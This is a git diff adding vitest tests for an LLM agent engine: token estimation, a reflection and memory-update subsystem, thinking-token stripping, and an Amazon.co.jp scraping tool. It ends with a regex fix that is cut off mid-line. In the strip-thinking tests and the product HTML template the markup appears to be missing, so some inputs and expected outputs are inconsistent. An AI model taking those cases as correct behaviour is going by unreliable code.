@@ +import { describe, expect, it } from 'vitest'; +import type { Message, ToolDef } from '../../llm/openai-compat.js'; +import { + estimateMessagesTokens, + estimateMessageTokens, + estimatePromptTokens, + estimateTokensFromChars, + estimateTokensFromText, + estimateToolsTokens, + IMAGE_CONTENT_TOKENS, + UNKNOWN_CHARS_TO_TOKENS_FACTOR, +} from './token-estimate.js'; + +describe('estimateTokensFromChars', () => { + it('returns 0 for 0 chars', () => { + expect(estimateTokensFromChars(0)).toBe(0); + }); + + it('applies the unknown-content factor with ceiling', () => { + expect(estimateTokensFromChars(1)).toBe(Math.ceil(1 * UNKNOWN_CHARS_TO_TOKENS_FACTOR)); // 2 + expect(estimateTokensFromChars(5)).toBe(6); // 5 * 1.2 = 6 exactly + expect(estimateTokensFromChars(10)).toBe(12); // 10 * 1.2 = 12 exactly + expect(estimateTokensFromChars(11)).toBe(14); // 13.2 -> ceil 14 + }); +}); + +describe('estimateTokensFromText', () => { + it('returns 0 for empty string', () => { + expect(estimateTokensFromText('')).toBe(0); + }); + + it('counts ASCII at ~3.5 chars per token', () => { + expect(estimateTokensFromText('a'.repeat(7))).toBe(2); // 7 / 3.5 = 2 exactly + expect(estimateTokensFromText('a'.repeat(35))).toBe(10); // 35 / 3.5 = 10 exactly + expect(estimateTokensFromText('a')).toBe(1); // 0.286 -> ceil 1 + }); + + it('counts CJK at 1.2 tokens per char', () => { + expect(estimateTokensFromText('あ')).toBe(2); // 1.2 -> ceil 2 + expect(estimateTokensFromText('日本語')).toBe(4); // 3.6 -> ceil 4 + expect(estimateTokensFromText('カタカナ')).toBe(5); // 4.8 -> ceil 5 + }); + + it('classifies full-width forms as CJK', () => { + // 'A' (U+FF21) and '!' (U+FF01) are in the full-width block. + expect(estimateTokensFromText('AB')).toBe(3); // 2.4 -> ceil 3 + }); + + it('counts other non-ASCII (accented latin, emoji) at 1 token per char', () => { + expect(estimateTokensFromText('é')).toBe(1); + expect(estimateTokensFromText('éà')).toBe(2); + }); + + it('iterates astral code points once (emoji is one char, not two surrogates)', () => { + expect(estimateTokensFromText('😀')).toBe(1); + expect(estimateTokensFromText('😀😀😀')).toBe(3); + }); + + it('mixes script classes additively before a single ceil', () => { + // 'abc' (3 ascii -> 0.857) + 'あ' (1.2) = 2.057 -> ceil 3 + expect(estimateTokensFromText('abcあ')).toBe(3); + }); + + it('estimates Japanese text far higher per char than ASCII text', () => { + const ascii = estimateTokensFromText('a'.repeat(100)); + const cjk = estimateTokensFromText('あ'.repeat(100)); + expect(ascii).toBe(29); // 100 / 3.5 -> ceil + expect(cjk).toBe(120); // 100 * 1.2 + }); +}); + +describe('estimateMessageTokens', () => { + it('charges role text plus a fixed 8-token overhead for an empty message', () => { + // 'user' = 4 ascii chars -> ceil(4/3.5) = 2, plus 8 overhead. + expect(estimateMessageTokens({ role: 'user' })).toBe(10); + }); + + it('adds string content tokens', () => { + const base = estimateMessageTokens({ role: 'user' }); + const withContent = estimateMessageTokens({ role: 'user', content: 'a'.repeat(35) }); + expect(withContent).toBe(base + 10); + }); + + it('sums text parts in array content', () => { + const msg: Message = { + role: 'user', + content: [ + { type: 'text', text: 'a'.repeat(7) }, + { type: 'text', text: 'b'.repeat(7) }, + ], + }; + expect(estimateMessageTokens(msg)).toBe(estimateMessageTokens({ role: 'user' }) + 4); + }); + + it('charges a flat image budget per image part', () => { + const msg: Message = { + role: 'user', + content: [{ type: 'image_url', image_url: { url: 'data:image/png;base64,xxxx' } }], + }; + expect(estimateMessageTokens(msg)).toBe(estimateMessageTokens({ role: 'user' }) + IMAGE_CONTENT_TOKENS); + }); + + it('counts tool_call_id and name on tool messages', () => { + const base = estimateMessageTokens({ role: 'tool' }); + const msg: Message = { + role: 'tool', + tool_call_id: 'c'.repeat(7), // 2 tokens + name: 'n'.repeat(7), // 2 tokens + }; + expect(estimateMessageTokens(msg)).toBe(base + 4); + }); + + it('counts tool_calls id, function name, and arguments', () => { + const base = estimateMessageTokens({ role: 'assistant' }); + const msg: Message = { + role: 'assistant', + tool_calls: [{ + id: 'i'.repeat(7), // 2 tokens + type: 'function', + function: { name: 'f'.repeat(7), arguments: 'a'.repeat(35) }, // 2 + 10 tokens + }], + }; + expect(estimateMessageTokens(msg)).toBe(base + 14); + }); + + it('handles a message combining content and multiple tool calls', () => { + const base = estimateMessageTokens({ role: 'assistant' }); + const call = { + id: 'i'.repeat(7), + type: 'function' as const, + function: { name: 'f'.repeat(7), arguments: 'a'.repeat(7) }, + }; + const msg: Message = { + role: 'assistant', + content: 'a'.repeat(7), + tool_calls: [call, call], + }; + // content 2 + 2 calls * (2 + 2 + 2) + expect(estimateMessageTokens(msg)).toBe(base + 2 + 12); + }); +}); + +describe('estimateMessagesTokens', () => { + it('returns 0 for an empty list', () => { + expect(estimateMessagesTokens([])).toBe(0); + }); + + it('sums per-message estimates', () => { + const m1: Message = { role: 'user', content: 'hello' }; + const m2: Message = { role: 'assistant', content: 'world' }; + expect(estimateMessagesTokens([m1, m2])) + .toBe(estimateMessageTokens(m1) + estimateMessageTokens(m2)); + }); +}); + +describe('estimateToolsTokens', () => { + it('estimates from the JSON serialization of the tool list', () => { + const tools: ToolDef[] = [{ + type: 'function', + function: { name: 'Read', description: 'Read a file.', parameters: { type: 'object' } }, + }]; + expect(estimateToolsTokens(tools)).toBe(estimateTokensFromText(JSON.stringify(tools))); + expect(estimateToolsTokens(tools)).toBeGreaterThan(0); + }); + + it('costs a small but non-zero amount for an empty tool list ("[]" is 2 chars)', () => { + expect(estimateToolsTokens([])).toBe(1); + }); +}); + +describe('estimatePromptTokens', () => { + it('is the sum of message and tool estimates', () => { + const messages: Message[] = [{ role: 'system', content: 'You are helpful.' }]; + const tools: ToolDef[] = [{ + type: 'function', + function: { name: 'X', description: 'd', parameters: {} }, + }]; + expect(estimatePromptTokens(messages, tools)) + .toBe(estimateMessagesTokens(messages) + estimateToolsTokens(tools)); + }); + + it('handles empty messages and tools', () => { + expect(estimatePromptTokens([], [])).toBe(1); // only "[]" tools serialization + }); +}); diff --git a/src/engine/reflection/reflection-prompt.test.ts b/src/engine/reflection/reflection-prompt.test.ts new file mode 100644 index 0000000..49a43d1 --- /dev/null +++ b/src/engine/reflection/reflection-prompt.test.ts @@ -0,0 +1,160 @@ +import { describe, it, expect } from 'vitest'; +import { buildSystemPrompt, buildUserPrompt } from './reflection-prompt.js'; +import type { ReflectionInput } from './types.js'; + +function makeInput(overrides: Partial = {}): ReflectionInput { + return { + originalJobId: 'job-1', + userId: 'u-1', + pieceName: 'chat', + pieceSource: 'builtin', + outcome: 'succeeded', + taskTitle: 'Summarize the report', + taskBody: 'Please summarize quarterly-report.pdf', + activityLogSummary: 'ReadPdf -> Write summary.md (2 iterations)', + postCompletionComments: [], + feedback: { rating: null, comment: null, tags: [] }, + resultText: 'Wrote output/summary.md', + observedRevisions: {}, + memoryIndex: '- [fact one](fact_one.md)', + memoryEntries: [], + pieceYaml: 'movements:\n - name: execute\n', + ...overrides, + }; +} + +describe('buildSystemPrompt', () => { + it('forces submit_reflection tool-call-only output', () => { + const sys = buildSystemPrompt(); + expect(sys).toContain('submit_reflection'); + }); + + it('states the memory rules: non-trivial lessons, type tagging, 3-change cap, abstain path', () => { + const sys = buildSystemPrompt(); + expect(sys).toContain('非自明'); + expect(sys).toContain('user | feedback | project | reference'); + expect(sys).toContain('最大 3 件'); + expect(sys).toContain('abstain_reason'); + expect(sys).toContain('should_edit=false'); + }); + + it('requires Why/How-to-apply lines for feedback/project entries', () => { + const sys = buildSystemPrompt(); + expect(sys).toContain('**Why:**'); + expect(sys).toContain('**How to apply:**'); + }); + + it('hardens piece edits: full-YAML replacement and no engine sentinels in rules[].next', () => { + const sys = buildSystemPrompt(); + expect(sys).toContain('完全置換'); + expect(sys).toContain('COMPLETE / ABORT / ASK'); + expect(sys).toContain('rules[].next'); + }); + + it('is deterministic (no timestamps or randomness)', () => { + expect(buildSystemPrompt()).toBe(buildSystemPrompt()); + }); +}); + +describe('buildUserPrompt', () => { + it('includes task title, body, activity log summary, result and outcome', () => { + const prompt = buildUserPrompt(makeInput()); + expect(prompt).toContain('title: Summarize the report'); + expect(prompt).toContain('body: Please summarize quarterly-report.pdf'); + expect(prompt).toContain('ReadPdf -> Write summary.md (2 iterations)'); + expect(prompt).toContain('status: succeeded'); + expect(prompt).toContain('result: Wrote output/summary.md'); + }); + + it('contains all section headers', () => { + const prompt = buildUserPrompt(makeInput()); + for (const header of [ + '## 元タスク', + '## 活動ログ (圧縮済み)', + '## ジョブ後のユーザーコメント', + '## 明示フィードバック', + '## 結果', + '## 現在の memory スナップショット', + '## 現在の piece YAML', + ]) { + expect(prompt).toContain(header); + } + }); + + it('renders post-completion comments with timestamp and author', () => { + const prompt = buildUserPrompt(makeInput({ + postCompletionComments: [ + { author: 'alice', body: 'wrong file was summarized', createdAt: '2026-06-10T00:00:00Z' }, + { author: 'bob', body: 'please retry', createdAt: '2026-06-10T01:00:00Z' }, + ], + })); + expect(prompt).toContain('- [2026-06-10T00:00:00Z] alice: wrong file was summarized'); + expect(prompt).toContain('- [2026-06-10T01:00:00Z] bob: please retry'); + expect(prompt).not.toContain('(なし)'); + }); + + it('shows (なし) when there are no post-completion comments', () => { + const prompt = buildUserPrompt(makeInput({ postCompletionComments: [] })); + expect(prompt).toContain('(なし)'); + }); + + it('shows "rating: none" when no explicit feedback exists', () => { + const prompt = buildUserPrompt(makeInput()); + expect(prompt).toContain('rating: none'); + expect(prompt).not.toContain('rating: good'); + expect(prompt).not.toContain('rating: bad'); + }); + + it('renders rating, comment and tags when feedback exists', () => { + const prompt = buildUserPrompt(makeInput({ + feedback: { rating: 'good', comment: 'nice work', tags: ['speed', 'quality'] }, + })); + expect(prompt).toContain('rating: good'); + expect(prompt).toContain('comment: nice work'); + expect(prompt).toContain('tags: speed, quality'); + }); + + it('omits comment/tags lines when feedback has neither', () => { + const prompt = buildUserPrompt(makeInput({ + feedback: { rating: 'good', comment: null, tags: [] }, + })); + expect(prompt).toContain('rating: good'); + expect(prompt).not.toContain('comment:'); + expect(prompt).not.toContain('tags:'); + }); + + it('appends the bad-rating investigation directive only for rating=bad', () => { + const bad = buildUserPrompt(makeInput({ + feedback: { rating: 'bad', comment: null, tags: [] }, + })); + expect(bad).toContain('**低評価**'); + + const good = buildUserPrompt(makeInput({ + feedback: { rating: 'good', comment: null, tags: [] }, + })); + expect(good).not.toContain('**低評価**'); + + const none = buildUserPrompt(makeInput()); + expect(none).not.toContain('**低評価**'); + }); + + it('embeds the memory index, or (空) when the user has no memory', () => { + const withMemory = buildUserPrompt(makeInput()); + expect(withMemory).toContain('- [fact one](fact_one.md)'); + expect(withMemory).not.toContain('(空)'); + + const empty = buildUserPrompt(makeInput({ memoryIndex: '' })); + expect(empty).toContain('(空)'); + }); + + it('wraps the current piece YAML in a yaml code fence', () => { + const prompt = buildUserPrompt(makeInput()); + expect(prompt).toContain('```yaml\nmovements:\n - name: execute\n\n```'); + }); + + it('does not truncate the activity log summary (truncation happens upstream in load-inputs)', () => { + const long = 'x'.repeat(20000); + const prompt = buildUserPrompt(makeInput({ activityLogSummary: long })); + expect(prompt).toContain(long); + }); +}); diff --git a/src/engine/reflection/reflection-runner.test.ts b/src/engine/reflection/reflection-runner.test.ts new file mode 100644 index 0000000..4bfffc4 --- /dev/null +++ b/src/engine/reflection/reflection-runner.test.ts @@ -0,0 +1,172 @@ +import { describe, it, expect, vi, beforeEach } from 'vitest'; +import type { Job, Repository } from '../../db/repository.js'; +import type { AppConfig } from '../../config.js'; + +vi.mock('./load-inputs.js', () => ({ loadReflectionInputs: vi.fn() })); +vi.mock('./reflection-prompt.js', () => ({ + buildSystemPrompt: vi.fn().mockReturnValue('SYSTEM'), + buildUserPrompt: vi.fn().mockReturnValue('USER'), +})); +vi.mock('./llm-client.js', () => ({ callReflectionLlm: vi.fn() })); +vi.mock('./applier.js', () => ({ applyReflectionUnlocked: vi.fn() })); +vi.mock('./snapshot.js', () => ({ writeSnapshot: vi.fn() })); +vi.mock('./user-lock.js', () => ({ + withUserLock: vi.fn(async (_dir: string, _user: string, fn: () => Promise) => fn()), +})); +vi.mock('../piece-catalog.js', () => ({ PieceCatalog: vi.fn() })); + +import { loadReflectionInputs } from './load-inputs.js'; +import { callReflectionLlm } from './llm-client.js'; +import { applyReflectionUnlocked } from './applier.js'; +import { writeSnapshot } from './snapshot.js'; +import { withUserLock } from './user-lock.js'; +import { runReflectionJob } from './reflection-runner.js'; + +const PAYLOAD = { + originalJobId: 'orig-1', + userId: 'user-1', + pieceName: 'chat', + outcome: 'succeeded' as const, +}; + +function makeJob(payload: unknown = PAYLOAD): Job { + return { + id: 'refl-1', + payload: payload === null ? null : JSON.stringify(payload), + } as unknown as Job; +} + +function makeDeps() { + const repo = { + recordReflectionMetric: vi.fn(), + } as unknown as Repository; + return { + repo, + config: { reflection: {}, userFolderRoot: 'data/users' } as unknown as AppConfig, + llmEndpoint: 'http://localhost:1', + llmModel: 'test-model', + }; +} + +const INPUT = { memoryEntries: [], pieceYaml: 'yaml' }; +const LLM_RESULT = { + parsed: { reasoning: 'because' }, + tokensIn: 100, + tokensOut: 50, + durationMs: 5, +}; + +function applierResult(overrides: Record = {}) { + return { + outcome: 'applied', + memoryDecisions: [ + { accepted: true, change: { op: 'add', name: 'fact-1', description: 'd', type: 'project', body: 'b' } }, + { accepted: false, code: 'too_vague', change: { op: 'add', name: 'fact-2', description: 'd', type: 'project', body: 'b' } }, + ], + pieceApplied: false, + ...overrides, + }; +} + +beforeEach(() => { + vi.clearAllMocks(); + vi.mocked(loadReflectionInputs).mockResolvedValue(INPUT as never); + vi.mocked(callReflectionLlm).mockResolvedValue(LLM_RESULT as never); + vi.mocked(applyReflectionUnlocked).mockResolvedValue(applierResult() as never); + vi.mocked(writeSnapshot).mockResolvedValue({ dir: '/snap/dir' } as never); +}); + +describe('runReflectionJob', () => { + it('returns failed for a job without payload and records no metric', async () => { + const deps = makeDeps(); + const outcome = await runReflectionJob(deps, makeJob(null)); + expect(outcome).toBe('failed'); + expect(deps.repo.recordReflectionMetric).not.toHaveBeenCalled(); + expect(loadReflectionInputs).not.toHaveBeenCalled(); + }); + + it('records a failed metric when input loading throws', async () => { + vi.mocked(loadReflectionInputs).mockRejectedValue(new Error('db gone')); + const deps = makeDeps(); + const outcome = await runReflectionJob(deps, makeJob()); + expect(outcome).toBe('failed'); + expect(deps.repo.recordReflectionMetric).toHaveBeenCalledWith( + expect.objectContaining({ outcome: 'failed', tokens_in: 0, tokens_out: 0 }), + ); + expect(callReflectionLlm).not.toHaveBeenCalled(); + }); + + it('records a failed metric when the LLM call throws', async () => { + vi.mocked(callReflectionLlm).mockRejectedValue(new Error('timeout')); + const deps = makeDeps(); + const outcome = await runReflectionJob(deps, makeJob()); + expect(outcome).toBe('failed'); + expect(deps.repo.recordReflectionMetric).toHaveBeenCalledWith( + expect.objectContaining({ outcome: 'failed', tokens_in: 0 }), + ); + expect(applyReflectionUnlocked).not.toHaveBeenCalled(); + }); + + it('applies, snapshots inside the user lock and records an applied metric', async () => { + const deps = makeDeps(); + const outcome = await runReflectionJob(deps, makeJob()); + + expect(outcome).toBe('applied'); + expect(withUserLock).toHaveBeenCalledWith('data/users', 'user-1', expect.any(Function)); + expect(writeSnapshot).toHaveBeenCalledTimes(1); + const snapMeta = vi.mocked(writeSnapshot).mock.calls[0]?.[3] as Record; + expect(snapMeta).toMatchObject({ + originalJobId: 'orig-1', + userId: 'user-1', + pieceName: 'chat', + outcome: 'applied', + memoryChanges: 1, + rejections: [{ code: 'too_vague', name: 'fact-2' }], + }); + expect(deps.repo.recordReflectionMetric).toHaveBeenCalledWith( + expect.objectContaining({ + reflection_job_id: 'refl-1', + original_job_id: 'orig-1', + user_id: 'user-1', + piece_name: 'chat', + outcome: 'applied', + memory_changes: 1, + piece_edited: 0, + tokens_in: 100, + tokens_out: 50, + }), + ); + }); + + it('propagates an abstained outcome from the applier', async () => { + vi.mocked(applyReflectionUnlocked).mockResolvedValue( + applierResult({ outcome: 'abstained', memoryDecisions: [] }) as never, + ); + const deps = makeDeps(); + const outcome = await runReflectionJob(deps, makeJob()); + expect(outcome).toBe('abstained'); + expect(deps.repo.recordReflectionMetric).toHaveBeenCalledWith( + expect.objectContaining({ outcome: 'abstained', memory_changes: 0 }), + ); + }); + + it('records a failed metric with LLM tokens when apply throws inside the lock', async () => { + vi.mocked(applyReflectionUnlocked).mockRejectedValue(new Error('lock contention')); + const deps = makeDeps(); + const outcome = await runReflectionJob(deps, makeJob()); + expect(outcome).toBe('failed'); + expect(deps.repo.recordReflectionMetric).toHaveBeenCalledWith( + expect.objectContaining({ outcome: 'failed', tokens_in: 100, tokens_out: 50 }), + ); + }); + + it('treats a snapshot failure as non-fatal', async () => { + vi.mocked(writeSnapshot).mockRejectedValue(new Error('disk full')); + const deps = makeDeps(); + const outcome = await runReflectionJob(deps, makeJob()); + expect(outcome).toBe('applied'); + expect(deps.repo.recordReflectionMetric).toHaveBeenCalledWith( + expect.objectContaining({ outcome: 'applied' }), + ); + }); +}); diff --git a/src/engine/reflection/reflection-schema.test.ts b/src/engine/reflection/reflection-schema.test.ts new file mode 100644 index 0000000..88ae2cf --- /dev/null +++ b/src/engine/reflection/reflection-schema.test.ts @@ -0,0 +1,71 @@ +import { describe, it, expect } from 'vitest'; +import { REFLECTION_TOOL_SCHEMA } from './reflection-schema.js'; + +// The schema is shipped verbatim to OpenAI-compatible endpoints as the tools[] +// entry, so its exact shape is load-bearing: these tests pin the contract. +describe('REFLECTION_TOOL_SCHEMA', () => { + const fn = REFLECTION_TOOL_SCHEMA.function; + const params = fn.parameters; + + it('is an OpenAI tools-format function definition named submit_reflection', () => { + expect(REFLECTION_TOOL_SCHEMA.type).toBe('function'); + expect(fn.name).toBe('submit_reflection'); + expect(typeof fn.description).toBe('string'); + expect(fn.description.length).toBeGreaterThan(0); + }); + + it('is JSON-serializable (no functions / cycles)', () => { + const roundTripped = JSON.parse(JSON.stringify(REFLECTION_TOOL_SCHEMA)); + expect(roundTripped).toEqual(REFLECTION_TOOL_SCHEMA); + }); + + it('requires memory_changes, piece_changes and reasoning at the top level', () => { + expect(params.type).toBe('object'); + expect(params.required).toEqual(['memory_changes', 'piece_changes', 'reasoning']); + expect(params.additionalProperties).toBe(false); + }); + + it('caps memory_changes at 3 items (matches the applier hard cap)', () => { + const mc = params.properties.memory_changes; + expect(mc.type).toBe('array'); + expect(mc.maxItems).toBe(3); + }); + + it('memory change items require op/name/type/description/body and forbid extras', () => { + const item = params.properties.memory_changes.items; + expect(item.required).toEqual(['op', 'name', 'type', 'description', 'body']); + expect(item.additionalProperties).toBe(false); + // merge_target is optional but declared + expect(item.properties.merge_target).toBeDefined(); + }); + + it('op enum matches ReflectionOp and type enum matches ReflectionMemoryType', () => { + const item = params.properties.memory_changes.items; + expect(item.properties.op.enum).toEqual(['add', 'update', 'merge_into', 'remove']); + expect(item.properties.type.enum).toEqual(['user', 'feedback', 'project', 'reference']); + }); + + it('enforces size ceilings: name<=96, description<=240, body<=16384', () => { + const item = params.properties.memory_changes.items; + expect(item.properties.name.minLength).toBe(1); + expect(item.properties.name.maxLength).toBe(96); + expect(item.properties.description.maxLength).toBe(240); + expect(item.properties.body.maxLength).toBe(16384); + expect(item.properties.merge_target.maxLength).toBe(96); + }); + + it('piece_changes requires only should_edit and allows nullable new_yaml', () => { + const pc = params.properties.piece_changes; + expect(pc.type).toBe('object'); + expect(pc.required).toEqual(['should_edit']); + expect(pc.additionalProperties).toBe(false); + expect(pc.properties.should_edit.type).toBe('boolean'); + expect(pc.properties.new_yaml.type).toEqual(['string', 'null']); + expect(pc.properties.diff_summary.maxLength).toBe(240); + }); + + it('reasoning and abstain_reason have length ceilings', () => { + expect(params.properties.reasoning.maxLength).toBe(2000); + expect(params.properties.abstain_reason.maxLength).toBe(500); + }); +}); diff --git a/src/engine/reflection/revisions.test.ts b/src/engine/reflection/revisions.test.ts new file mode 100644 index 0000000..c471684 --- /dev/null +++ b/src/engine/reflection/revisions.test.ts @@ -0,0 +1,40 @@ +import { describe, it, expect } from 'vitest'; +import { createHash } from 'crypto'; +import { bodyRevision } from './revisions.js'; + +describe('bodyRevision', () => { + it('returns the sha1 hex digest of the body string', () => { + const body = 'The user prefers markdown output.\n'; + const expected = createHash('sha1').update(body).digest('hex'); + expect(bodyRevision(body)).toBe(expected); + }); + + it('is deterministic for the same input', () => { + expect(bodyRevision('same input')).toBe(bodyRevision('same input')); + }); + + it('produces different digests for different bodies', () => { + expect(bodyRevision('body A')).not.toBe(bodyRevision('body B')); + }); + + it('is sensitive to trailing whitespace (gray-matter newline normalization matters)', () => { + // The doc comment in revisions.ts says the parsed body (which gray-matter + // round-trips with a trailing newline) is the canonical input. A body with + // and without the trailing newline must therefore hash differently. + expect(bodyRevision('content')).not.toBe(bodyRevision('content\n')); + }); + + it('returns a 40-char lowercase hex string', () => { + expect(bodyRevision('anything')).toMatch(/^[0-9a-f]{40}$/); + }); + + it('handles the empty string (well-known sha1)', () => { + expect(bodyRevision('')).toBe('da39a3ee5e6b4b0d3255bfef95601890afd80709'); + }); + + it('handles multibyte (Japanese) content as UTF-8', () => { + const body = '教訓: ユーザーは簡潔な回答を好む。'; + const expected = createHash('sha1').update(body, 'utf8').digest('hex'); + expect(bodyRevision(body)).toBe(expected); + }); +}); diff --git a/src/engine/strip-thinking.test.ts b/src/engine/strip-thinking.test.ts new file mode 100644 index 0000000..8076bec --- /dev/null +++ b/src/engine/strip-thinking.test.ts @@ -0,0 +1,52 @@ +import { describe, it, expect } from 'vitest'; +import { stripThinkingTokens } from './strip-thinking.js'; + +describe('stripThinkingTokens', () => { + it('returns plain text unchanged (modulo trim)', () => { + expect(stripThinkingTokens('hello world')).toBe('hello world'); + expect(stripThinkingTokens(' padded ')).toBe('padded'); + }); + + it('handles empty input', () => { + expect(stripThinkingTokens('')).toBe(''); + }); + + it('strips a DeepSeek-style block', () => { + expect(stripThinkingTokens('internal reasoninganswer')).toBe('answer'); + }); + + it('strips multiple blocks non-greedily', () => { + const input = 'afirstbsecond'; + expect(stripThinkingTokens(input)).toBe('firstsecond'); + }); + + it('strips multiline content', () => { + const input = 'line1\nline2\n\nresult'; + expect(stripThinkingTokens(input)).toBe('result'); + }); + + it('leaves an unclosed block intact', () => { + const input = 'never closed... answer'; + expect(stripThinkingTokens(input)).toBe('never closed... answer'); + }); + + it('strips generic <|thinking|> blocks', () => { + expect(stripThinkingTokens('<|thinking|>hmm<|/thinking|>ok')).toBe('ok'); + }); + + it('strips Gemma-style thought + channel marker', () => { + expect(stripThinkingTokens('thought\nvisible')).toBe('visible'); + }); + + it('strips paired blocks', () => { + expect(stripThinkingTokens('internalvisible')).toBe('visible'); + }); + + it('preserves unicode content outside thinking blocks', () => { + expect(stripThinkingTokens('思考日本語の回答')).toBe('日本語の回答'); + }); + + it('returns empty string when the whole response is a thinking block', () => { + expect(stripThinkingTokens('only thoughts')).toBe(''); + }); +}); diff --git a/src/engine/tools/amazon.test.ts b/src/engine/tools/amazon.test.ts new file mode 100644 index 0000000..5cb6e2c --- /dev/null +++ b/src/engine/tools/amazon.test.ts @@ -0,0 +1,152 @@ +import { afterEach, describe, expect, it, vi } from 'vitest'; +import type { ToolContext } from './core.js'; +import { executeTool, ensureKeepaGraphs, TOOL_DEFS } from './amazon.js'; +import type { AmazonProductData } from './structured-blocks.js'; + +afterEach(() => { + vi.unstubAllGlobals(); +}); + +const ctx = (toolsConfig: Record = {}): ToolContext => + ({ toolsConfig }) as unknown as ToolContext; + +function productBlock(asin: string, title: string, opts: { price?: string; rating?: string; reviews?: string } = {}): string { + return ` +
+ +

${title}

+ ${opts.price ? `${opts.price}` : ''} + ${opts.rating ? `5つ星のうち${opts.rating}` : ''} + ${opts.reviews ? `${opts.reviews}` : ''} +
`; +} + +const SEARCH_HTML = ` +${productBlock('B012345678', 'ワイヤレスイヤホン & ケース', { price: '¥12,980', rating: '4.5', reviews: '1,234' })} +${productBlock('B087654321', 'モバイルバッテリー')} +`; + +function htmlResponse(body: string, status = 200): Response { + return new Response(body, { status, headers: { 'content-type': 'text/html' } }); +} + +describe('TOOL_DEFS', () => { + it('registers SearchAmazon with query required', () => { + expect(TOOL_DEFS['SearchAmazon']?.function.name).toBe('SearchAmazon'); + expect(TOOL_DEFS['SearchAmazon']?.function.parameters?.['required']).toEqual(['query']); + }); +}); + +describe('SearchAmazon', () => { + it('returns null for unknown tool names', async () => { + expect(await executeTool('NotAmazon', {}, ctx())).toBeNull(); + }); + + it('requires a query', async () => { + const res = await executeTool('SearchAmazon', {}, ctx()); + expect(res?.isError).toBe(true); + expect(res?.output).toContain('query is required'); + }); + + it('parses products into markdown with Keepa graphs and structured blocks', async () => { + vi.stubGlobal('fetch', vi.fn().mockImplementation(async () => htmlResponse(SEARCH_HTML))); + const res = await executeTool('SearchAmazon', { query: 'イヤホン' }, ctx()); + + expect(res?.isError).toBe(false); + expect(res?.output).toContain('## Amazon.co.jp 検索結果: 「イヤホン」'); + // Entity-decoded title, price, rating with review count. + expect(res?.output).toContain('ワイヤレスイヤホン & ケース'); + expect(res?.output).toContain('- **価格**: ¥12,980'); + expect(res?.output).toContain('- **評価**: 4.5 (1,234件)'); + expect(res?.output).toContain('![商品画像](https://m.media-amazon.com/images/B012345678.jpg)'); + expect(res?.output).toContain('graph.keepa.com/pricehistory.png?asin=B012345678&domain=co.jp'); + expect(res?.output).toContain('https://www.amazon.co.jp/dp/B012345678'); + expect(res?.output).toMatch(/\[\[embed:amazon-\d+\]\]/); + + const blocks = res?.structuredBlocks ?? []; + expect(blocks).toHaveLength(1); + expect(blocks[0]?.type).toBe('amazon_products'); + const data = blocks[0]?.data as AmazonProductData; + expect(data.products).toHaveLength(2); + expect(data.products[0]).toMatchObject({ + asin: 'B012345678', + rating: 4.5, + reviewCount: 1234, + }); + }); + + it('parses an integer rating from 5つ星のうち5', async () => { + const html = `${productBlock('B099999999', '満点商品', { rating: '5', reviews: '10' })}`; + vi.stubGlobal('fetch', vi.fn().mockImplementation(async () => htmlResponse(html))); + const res = await executeTool('SearchAmazon', { query: 'x' }, ctx()); + expect(res?.output).toContain('- **評価**: 5 (10件)'); + }); + + it('appends the affiliate tag from tools config to product URLs', async () => { + vi.stubGlobal('fetch', vi.fn().mockImplementation(async () => htmlResponse(SEARCH_HTML))); + const res = await executeTool( + 'SearchAmazon', + { query: 'イヤホン' }, + ctx({ amazonAffiliateTag: 'mytag-22' }), + ); + expect(res?.output).toContain('https://www.amazon.co.jp/dp/B012345678?tag=mytag-22'); + }); + + it('caps max_results', async () => { + const many = `${Array.from({ length: 12 }, (_, i) => + productBlock(`B0000000${String(i).padStart(2, '0')}`.slice(0, 10), `商品${i}`), + ).join('\n')}`; + vi.stubGlobal('fetch', vi.fn().mockImplementation(async () => htmlResponse(many))); + const res = await executeTool('SearchAmazon', { query: 'x', max_results: 3 }, ctx()); + const data = (res?.structuredBlocks?.[0]?.data ?? { products: [] }) as AmazonProductData; + expect(data.products).toHaveLength(3); + }); + + it('suggests BrowseWeb when parsing finds nothing (likely blocked)', async () => { + vi.stubGlobal('fetch', vi.fn().mockImplementation(async () => htmlResponse('captcha'))); + const res = await executeTool('SearchAmazon', { query: 'イヤホン' }, ctx()); + expect(res?.isError).toBe(false); + expect(res?.output).toContain('BrowseWeb'); + expect(res?.output).toContain('取得できませんでした'); + }); + + it('reports HTTP failures as tool errors with a fallback hint', async () => { + vi.stubGlobal('fetch', vi.fn().mockImplementation(async () => htmlResponse('nope', 503))); + const res = await executeTool('SearchAmazon', { query: 'イヤホン' }, ctx()); + expect(res?.isError).toBe(true); + expect(res?.output).toContain('Amazon 検索に失敗しました'); + expect(res?.output).toContain('BrowseWeb'); + }); +}); + +describe('ensureKeepaGraphs', () => { + it('appends missing Keepa graphs for ASINs referenced in the text', () => { + const text = 'おすすめ: https://www.amazon.co.jp/dp/B012345678 です。'; + const out = ensureKeepaGraphs(text); + expect(out).toContain('### 価格推移 (Keepa)'); + expect(out).toContain('pricehistory.png?asin=B012345678'); + }); + + it('leaves text alone when graphs are already present', () => { + const text = [ + 'https://www.amazon.co.jp/dp/B012345678', + '![価格推移](https://graph.keepa.com/pricehistory.png?asin=B012345678&domain=co.jp)', + ].join('\n'); + expect(ensureKeepaGraphs(text)).toBe(text); + }); + + it('leaves text without ASINs untouched', () => { + expect(ensureKeepaGraphs('no products here')).toBe('no products here'); + }); + + it('only appends graphs for the ASINs that are missing', () => { + const text = [ + 'https://www.amazon.co.jp/dp/B012345678', + 'https://www.amazon.co.jp/dp/B087654321', + '![価格推移](https://graph.keepa.com/pricehistory.png?asin=B012345678&domain=co.jp)', + ].join('\n'); + const out = ensureKeepaGraphs(text); + expect(out.match(/pricehistory\.png\?asin=B087654321/g)).toHaveLength(1); + expect(out.match(/pricehistory\.png\?asin=B012345678/g)).toHaveLength(1); + }); +}); diff --git a/src/engine/tools/amazon.ts b/src/engine/tools/amazon.ts index c613ee7..85846a9 100644 --- a/src/engine/tools/amazon.ts +++ b/src/engine/tools/amazon.ts @@ -85,8 +85,9 @@ function parseProducts(html: string, maxResults: number): AmazonProduct[] { } // Extract rating: 5つ星のうち4.5 - const ratingMatch = block.match(/([\d.]+つ星のうち[\d.]+)<\/span>/i) - || block.match(/(\d+(?:\.\d+)?)\s*つ星のうち/i); + // The actual rating is the number AFTER のうち; the one before is the scale. + const ratingMatch = block.match(/[\d.]+つ星のうち([\d.]+)<\/span>/i) + || block.match(/つ星のうち\s*(\d+(?:\.\d+)?)/i); if (ratingMatch) { const rVal = ratingMatch[1].match(/(\d+(?:\.\d+)?)/); if (rVal) product.rating = 